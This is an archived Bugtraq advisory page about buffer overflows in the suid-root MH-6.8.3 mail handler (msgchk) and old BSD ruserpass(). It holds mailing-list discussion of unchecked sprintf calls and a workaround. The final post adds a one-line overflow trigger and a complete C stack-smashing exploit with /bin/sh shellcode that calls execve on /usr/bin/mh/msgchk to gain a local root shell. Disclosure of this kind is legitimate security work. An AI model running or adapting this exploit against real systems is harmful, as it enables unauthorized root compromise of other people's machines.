Overflow in Mailhandler 6.8.3

Summary
Description:The suid MH-6.8.3 package has several buffer overflow bugs (among other holes). Also some BSD ruserpass() libc functions have the same hole.
Author:Matt Conover <shok@COBRA.ONLINEX.NET>
Compromise: root (local)
Vulnerable Systems:Redhat Linux 4.1, although you may have to specifically enable something. Also old versions of the *BSD libc function ruserpass().
Date:26 July 1997
Notes:I appended Alan Cox's post about *BSD ruserpass() to the end. I also put some new information from Matt Conover (who sent the original post) in the addendum.. Also note that the vulnerable programs are bbc,inc,mhn,msgchk, and popi. Redhat's package mh-6.8.3-13.i386.rpm installs /usr/bin/mh/inc and /usr/bin/mh/msgchk suid ROOT.
Details


Date: Sat, 26 Jul 1997 18:08:00 -0600
From: Matt Conover <shok@COBRA.ONLINEX.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Multiply bugs in MH-6.8.3 (Mail Handler program)

Okay there is an overflow in MH-6.8.3, which is suid, which I THINK (not
sure), is installed, at least in Redhat 4.1+,  by default (I think this
is installed within the mail package regardless of distribution, but I
never specifically installed it). This actually has a few overflows (I
haven't actually tested this but it looks quite obvious, you'll have to
test it yourself).


The only one I'm going to describe is the program'msgchk', which is suid
(on my server it's installed by default in /usr/bin/mh/msgchk (in
function checkmail), you would also want to check /usr/lib/mh/msgchk.
(You ought to look through the code yourself..I notice quite a few
bugs..this program relies heavily on buffers and enviromental variables)

This is pretty straight forward.
  char *hdir, buf[BUFSIZ], *tmp;
                           ^^^^^^^^ not sure the exact value..check the
*.h files..for test
                                             purposes if you try to
overflow this...just use a size
                                             of 9999, just to see if it
segfaults.

        hdir = getenv("HOME");
        if (hdir == NULL)
                hdir = ".";
        (void) sprintf(buf, "%s/.netrc", hdir);

Obviously it never even checks the value of hdir..so export your home
directory to something very large (if this doesn't work, they still
disobeyed something that libc specifically says not to do...they say to
use (can't remember the exact function) _secure_getenv,
_securelib_getenv (??) something like that..and they also said NOT to
define it to set the HOME to "." (the current path) for reasons that
someone could link .netrc to something and since it's suid... test this
yourself..I don't have too much time

                                     Matt Conover (shok@onlinex.net
--  Shok).

Date: Mon, 28 Jul 1997 23:27:48 +0100
From: Alan Cox <alan@LXORGUK.UKUU.ORG.UK>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Multiply bugs in MH-6.8.3 (Mail Handler program)

> ruserpass(host,&user,&pass); is found in msgchk.c, in checkremote() or
> something like that... meaning that the host aren't vulnerable if not
> configured.. this is from a system where mh was installed w/o being

Also that means ruserpass() from libc isnt being used which is probably
bad as most libc's have this fixed. (The hole above btw is in all the old
BSD derived libc's) but very very few current ones.
Date: Mon, 28 Jul 1997 22:51:48 -0600
From: Matt Conover 
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Multiply bugs in MH-6.8.3 (Mail Handler program)

No actually you're wrong...there are two different overflows...this is why
I said there are MULTIPLE bugs...I just only mentioned one..because that
one is used no checkmail() and it will be called but there is an
exception:
static int  checkmail (user, home, datesw, notifysw, personal)
register char *user, *home;
int     datesw,
        notifysw,
        personal;
{
    int     mf,
            status;
    char    buffer[BUFSIZ];
    struct stat st;

    (void) sprintf (buffer, "%s/%s",
            mmdfldir[0] ? mmdfldir : home,
            mmdflfil[0] ? mmdflfil : user);

The exception is if mmdfldir[0] is true..otherwise this WILL get called
and this is directly in msgchk.c checkmail() NOT in ruserpass.c that is a
completely different overflow

Date: Tue, 12 May 1998 12:28:00 +0200
From: Jorge Hurtado Rojo <jhurtado@QUARKSS.ES> To: BUGTRAQ@NETSPACE.ORG
Subject: buffer overflow in msgchk

Hi,

Sometime ago was published in bugtraq that a vulnerabily existed in the msgchk program, which is installed suid root in redhat 5.0:

msgchk -host `perl -e 'print "A" x 2000'`

leads to a segfault, which can be exploited to get root access.

Workaround: chmod 000 /usr/bin/mh/msgchk, uninstall the packet, compile it without RPOP / suid or use a wrapper (safeload).

The exploit follows.
(Sorry if this exploit was already posted. I have not seen it)

/* Almost everything here taken from Aleph One's Article about stack smashing (Phrack 49) */

#include <stdlib.h>

#define DEFAULT_OFFSET                 0
#define DEFAULT_BUFFER_SIZE            1018
#define NOP                            0x90

char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {

__asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
char *buff, *ptr;
char *args[5];
char jorge[]="";
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i;
if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]);

if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n"); exit(0);
}

addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);

ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4) {
buff[i]=addr & 0xFF;
buff[i+1]=(addr >> 8) & 0xFF;
buff[i+2]=(addr >> 16) & 0xFF;
buff[i+3]=(addr >> 24) & 0xFF;
}

*(addr_ptr++) = addr;

for (i = 0; i < bsize/2; i++)
buff[i] = NOP;

ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];

buff[bsize - 1] = '\0';

args[0]="/usr/bin/mh/msgchk";
args[1]="-host";
args[2]=buff;
args[3]=NULL;
execve(args[0],args,NULL);

}

Jorge Hurtado
Quark Software & Services
http://www.quarkss.es
More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]